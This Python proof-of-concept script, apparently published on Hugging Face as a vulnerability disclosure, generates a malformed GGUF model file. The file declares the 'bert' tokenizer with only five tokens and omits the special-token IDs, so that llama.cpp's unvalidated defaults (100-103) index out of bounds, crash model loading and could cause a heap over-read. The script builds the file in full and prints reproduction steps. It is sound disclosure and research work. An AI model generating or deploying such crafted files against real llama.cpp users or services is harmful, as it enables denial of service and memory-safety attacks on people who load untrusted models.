llama-cpp-special-token-oob-poc / poc_special_token_oob.py
salvepilo's picture
Upload poc_special_token_oob.py with huggingface_hub
0584214 verified
#!/usr/bin/env python3
"""
PoC: Heap Buffer Over-read via Unvalidated Default Special Token IDs in GGUF
Vulnerability: In llama-vocab.cpp, when tokenizer.ggml.model = "bert", default
special token IDs are set to: bos=101, unk=100, sep=102, pad=0, mask=103
(lines 1754-1763). These defaults are NOT validated against the actual vocabulary
size. If the GGUF has fewer than 104 tokens AND does not include explicit
tokenizer.ggml.bos_token_id (etc.) keys, the defaults remain.
Later, print_info() at line 3352 does:
id_to_token.at(special_bos_id) // special_bos_id = 101, vector size = 5
which throws std::out_of_range. The exception propagates up and causes model
loading to fail with "error loading model: vector" (the what() string of
std::out_of_range from vector::at). This demonstrates the unvalidated OOB access.
Additionally, if the model somehow survived past print_info(), the special token
IDs would be used in tokenization (e.g., push_back(special_bos_id=101) at line
3027), causing OOB embedding lookups -- a true heap buffer over-read.
For the "llama" tokenizer variant, special_eos_id=2 with 1 token hits the even
more dangerous id_to_token[tid] ([] operator, no bounds check) at line 2527
during the special_eog_ids loop -- true undefined behavior / heap over-read.
This script creates a raw GGUF v3 binary file with:
- general.architecture = "llama" (so llama model loader is used)
- tokenizer.ggml.model = "bert" (triggers OOB default special token IDs)
- tokenizer.ggml.tokens = 5 tokens only (indices 0-4)
- NO tokenizer.ggml.bos_token_id or other special token ID keys
- All required llama architecture metadata
- Minimal dummy tensors to pass model loading checks
"""
import struct
import os
import sys
import numpy as np
# ============================================================================
# GGUF constants
# ============================================================================
GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3
GGUF_DEFAULT_ALIGNMENT = 32
# GGUF value types
GGUF_TYPE_UINT8 = 0
GGUF_TYPE_INT8 = 1
GGUF_TYPE_UINT16 = 2
GGUF_TYPE_INT16 = 3
GGUF_TYPE_UINT32 = 4
GGUF_TYPE_INT32 = 5
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_BOOL = 7
GGUF_TYPE_STRING = 8
GGUF_TYPE_ARRAY = 9
GGUF_TYPE_UINT64 = 10
GGUF_TYPE_INT64 = 11
GGUF_TYPE_FLOAT64 = 12
# GGML tensor types
GGML_TYPE_F32 = 0
GGML_TYPE_F16 = 1
# ============================================================================
# GGUF writing helpers
# ============================================================================
def write_string(f, s):
"""Write a GGUF string: uint64 length + UTF-8 chars (no null terminator)."""
encoded = s.encode('utf-8')
f.write(struct.pack('<Q', len(encoded)))
f.write(encoded)
def write_kv_string(f, key, value):
"""Write a KV pair with string value."""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_STRING))
write_string(f, value)
def write_kv_uint32(f, key, value):
"""Write a KV pair with uint32 value."""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_UINT32))
f.write(struct.pack('<I', value))
def write_kv_int32(f, key, value):
"""Write a KV pair with int32 value."""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_INT32))
f.write(struct.pack('<i', value))
def write_kv_float32(f, key, value):
"""Write a KV pair with float32 value."""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
f.write(struct.pack('<f', value))
def write_kv_bool(f, key, value):
"""Write a KV pair with bool value (stored as int8)."""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_BOOL))
f.write(struct.pack('<b', 1 if value else 0))
def write_kv_string_array(f, key, values):
"""Write a KV pair with string array value."""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
f.write(struct.pack('<I', GGUF_TYPE_STRING)) # element type
f.write(struct.pack('<Q', len(values))) # array length
for v in values:
write_string(f, v)
def write_kv_float32_array(f, key, values):
"""Write a KV pair with float32 array value."""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
f.write(struct.pack('<I', GGUF_TYPE_FLOAT32)) # element type
f.write(struct.pack('<Q', len(values))) # array length
for v in values:
f.write(struct.pack('<f', v))
def write_kv_int32_array(f, key, values):
"""Write a KV pair with int32 array value."""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
f.write(struct.pack('<I', GGUF_TYPE_INT32)) # element type
f.write(struct.pack('<Q', len(values))) # array length
for v in values:
f.write(struct.pack('<i', v))
def write_tensor_info(f, name, shape, ggml_type, offset):
"""Write tensor info entry.
Format: name (string), n_dims (uint32), dims[] (int64 each), type (int32), offset (uint64)
"""
write_string(f, name)
n_dims = len(shape)
f.write(struct.pack('<I', n_dims))
for dim in shape:
f.write(struct.pack('<q', dim))
f.write(struct.pack('<i', ggml_type))
f.write(struct.pack('<Q', offset))
def tensor_byte_size(shape, ggml_type):
"""Calculate raw byte size of a tensor."""
n_elements = 1
for d in shape:
n_elements *= d
if ggml_type == GGML_TYPE_F32:
return n_elements * 4
elif ggml_type == GGML_TYPE_F16:
return n_elements * 2
else:
raise ValueError(f"Unsupported ggml_type: {ggml_type}")
def align_offset(offset, alignment=GGUF_DEFAULT_ALIGNMENT):
"""Align offset to the given alignment boundary."""
return ((offset + alignment - 1) // alignment) * alignment
# ============================================================================
# Main PoC
# ============================================================================
def create_poc_gguf(output_path):
"""Create a minimal GGUF that triggers OOB access via default bert special token IDs."""
# Model hyperparameters (tiny llama architecture)
n_vocab = 5 # ONLY 5 tokens -- bert defaults (100-103) will be OOB!
n_embd = 32 # tiny embedding dimension
n_head = 4 # attention heads
n_head_kv = 4 # KV heads
n_layer = 1 # single transformer layer
n_ff = 64 # feed-forward dimension
ctx_len = 128 # context length
# Token list: only 5 tokens (indices 0-4)
# bert defaults: bos=101, unk=100, sep=102, pad=0, mask=103
# All except pad=0 are out of bounds!
tokens = ["[PAD]", "[UNK]", "[CLS]", "[SEP]", "[MASK]"]
token_scores = [0.0] * n_vocab
token_types = [0] * n_vocab # all normal
# Tensors we need for a minimal llama model
tensors = [
("token_embd.weight", (n_vocab, n_embd), GGML_TYPE_F16),
("output_norm.weight", (n_embd,), GGML_TYPE_F32),
("output.weight", (n_vocab, n_embd), GGML_TYPE_F16),
("blk.0.attn_norm.weight", (n_embd,), GGML_TYPE_F32),
("blk.0.attn_q.weight", (n_embd, n_embd), GGML_TYPE_F16),
("blk.0.attn_k.weight", (n_head_kv * (n_embd // n_head), n_embd), GGML_TYPE_F16),
("blk.0.attn_v.weight", (n_head_kv * (n_embd // n_head), n_embd), GGML_TYPE_F16),
("blk.0.attn_output.weight", (n_embd, n_embd), GGML_TYPE_F16),
("blk.0.ffn_norm.weight", (n_embd,), GGML_TYPE_F32),
("blk.0.ffn_gate.weight", (n_ff, n_embd), GGML_TYPE_F16),
("blk.0.ffn_up.weight", (n_ff, n_embd), GGML_TYPE_F16),
("blk.0.ffn_down.weight", (n_embd, n_ff), GGML_TYPE_F16),
]
# -----------------------------------------------------------------------
# Count KV pairs
# -----------------------------------------------------------------------
# Architecture metadata (10 keys):
# general.architecture, general.name,
# llama.context_length, llama.embedding_length, llama.block_count,
# llama.attention.head_count, llama.attention.head_count_kv,
# llama.feed_forward_length, llama.vocab_size,
# llama.attention.layer_norm_rms_epsilon, llama.rope.dimension_count
#
# Tokenizer metadata (4 keys):
# tokenizer.ggml.model, tokenizer.ggml.tokens,
# tokenizer.ggml.scores, tokenizer.ggml.token_type
#
# DELIBERATELY OMITTED (to keep default OOB IDs):
# tokenizer.ggml.bos_token_id (default: 101 for bert -> OOB!)
# tokenizer.ggml.eos_token_id (default: LLAMA_TOKEN_NULL for bert)
# tokenizer.ggml.unknown_token_id (default: 100 for bert -> OOB!)
# tokenizer.ggml.separator_token_id (default: 102 for bert -> OOB!)
# tokenizer.ggml.padding_token_id (default: 0 for bert -> in bounds)
n_kv = 15 # 11 arch + 4 tokenizer
n_tensors = len(tensors)
print(f"[*] Creating PoC GGUF: {output_path}")
print(f"[*] Vocabulary size: {n_vocab} tokens (indices 0-{n_vocab-1})")
print(f"[*] Tokenizer model: bert")
print(f"[*] Default special token IDs (unvalidated):")
print(f"[*] bos_token_id = 101 (OOB! vector size = {n_vocab})")
print(f"[*] unk_token_id = 100 (OOB! vector size = {n_vocab})")
print(f"[*] sep_token_id = 102 (OOB! vector size = {n_vocab})")
print(f"[*] mask_token_id = 103 (OOB! vector size = {n_vocab})")
print(f"[*] pad_token_id = 0 (in bounds)")
print(f"[*] No explicit special token ID keys in GGUF -> defaults are used")
print(f"[*] Number of KV pairs: {n_kv}")
print(f"[*] Number of tensors: {n_tensors}")
with open(output_path, 'wb') as f:
# ===================================================================
# GGUF Header
# ===================================================================
f.write(GGUF_MAGIC) # magic (4 bytes)
f.write(struct.pack('<I', GGUF_VERSION)) # version (uint32)
f.write(struct.pack('<Q', n_tensors)) # n_tensors (uint64)
f.write(struct.pack('<Q', n_kv)) # n_kv (uint64)
# ===================================================================
# KV Pairs - Architecture metadata
# ===================================================================
write_kv_string(f, "general.architecture", "llama")
write_kv_string(f, "general.name", "poc-bert-oob-special-tokens")
write_kv_uint32(f, "llama.context_length", ctx_len)
write_kv_uint32(f, "llama.embedding_length", n_embd)
write_kv_uint32(f, "llama.block_count", n_layer)
write_kv_uint32(f, "llama.attention.head_count", n_head)
write_kv_uint32(f, "llama.attention.head_count_kv", n_head_kv)
write_kv_uint32(f, "llama.feed_forward_length", n_ff)
write_kv_uint32(f, "llama.vocab_size", n_vocab)
write_kv_float32(f, "llama.attention.layer_norm_rms_epsilon", 1e-5)
write_kv_uint32(f, "llama.rope.dimension_count", n_embd // n_head)
# ===================================================================
# KV Pairs - Tokenizer metadata
# ===================================================================
# tokenizer model = "bert" -> triggers default special IDs 100-103
write_kv_string(f, "tokenizer.ggml.model", "bert")
# Only 5 tokens! IDs 100-103 are wildly out of bounds.
write_kv_string_array(f, "tokenizer.ggml.tokens", tokens)
write_kv_float32_array(f, "tokenizer.ggml.scores", token_scores)
write_kv_int32_array(f, "tokenizer.ggml.token_type", token_types)
# DELIBERATELY NOT INCLUDED:
# tokenizer.ggml.bos_token_id
# tokenizer.ggml.eos_token_id
# tokenizer.ggml.unknown_token_id
# tokenizer.ggml.separator_token_id
# tokenizer.ggml.padding_token_id
# This means the code uses UNVALIDATED defaults from llama-vocab.cpp:1754-1763
# ===================================================================
# Tensor Info Entries
# ===================================================================
# Calculate offsets for each tensor (relative to start of tensor data)
tensor_data_entries = []
current_offset = 0
for tname, tshape, ttype in tensors:
# Each tensor's offset within the data blob must be aligned
current_offset = align_offset(current_offset, GGUF_DEFAULT_ALIGNMENT)
size = tensor_byte_size(tshape, ttype)
tensor_data_entries.append((tname, tshape, ttype, current_offset, size))
write_tensor_info(f, tname, tshape, ttype, current_offset)
current_offset += size
total_tensor_data_size = align_offset(current_offset, GGUF_DEFAULT_ALIGNMENT)
# ===================================================================
# Tensor Data (aligned to GGUF_DEFAULT_ALIGNMENT from start of file)
# ===================================================================
# Pad to alignment boundary before tensor data
current_pos = f.tell()
aligned_pos = align_offset(current_pos, GGUF_DEFAULT_ALIGNMENT)
if aligned_pos > current_pos:
f.write(b'\x00' * (aligned_pos - current_pos))
data_start = f.tell()
# Write each tensor's data (all zeros)
for tname, tshape, ttype, toffset, tsize in tensor_data_entries:
# Pad to reach the tensor's offset
current_data_pos = f.tell() - data_start
target_pos = toffset
if target_pos > current_data_pos:
f.write(b'\x00' * (target_pos - current_data_pos))
# Write tensor data (all zeros for PoC)
if ttype == GGML_TYPE_F32:
data = np.zeros(tshape, dtype=np.float32)
# For norm weights, use ones
if "norm" in tname:
data = np.ones(tshape, dtype=np.float32)
f.write(data.tobytes())
elif ttype == GGML_TYPE_F16:
data = np.zeros(tshape, dtype=np.float16)
f.write(data.tobytes())
# Final alignment padding
current_pos = f.tell()
aligned_pos = align_offset(current_pos, GGUF_DEFAULT_ALIGNMENT)
if aligned_pos > current_pos:
f.write(b'\x00' * (aligned_pos - current_pos))
file_size = os.path.getsize(output_path)
print(f"\n[+] Created: {output_path}")
print(f"[+] Size: {file_size} bytes ({file_size/1024:.1f} KB)")
print(f"\n[*] Crash path:")
print(f"[*] 1. llama-vocab.cpp:1754-1763 sets bert defaults: bos=101, unk=100, sep=102, mask=103")
print(f"[*] 2. llama-vocab.cpp:2130-2131 resizes id_to_token to {n_vocab} (from token list)")
print(f"[*] 3. llama-vocab.cpp:2215-2228 only overrides if keys EXIST in GGUF (they don't)")
print(f"[*] 4. llama-vocab.cpp:3352 does id_to_token.at(101) -> std::out_of_range -> abort()")
print(f"\n[+] To reproduce:")
print(f"[+] llama-cli -m {output_path} -p 'hello'")
print(f"[+] Expected: crash via uncaught std::out_of_range exception (abort/SIGABRT)")
if __name__ == "__main__":
output_dir = "/Users/eltarne/Documents/script/gguf_poc"
os.makedirs(output_dir, exist_ok=True)
output_path = os.path.join(output_dir, "poc_special_token_oob.gguf")
create_poc_gguf(output_path)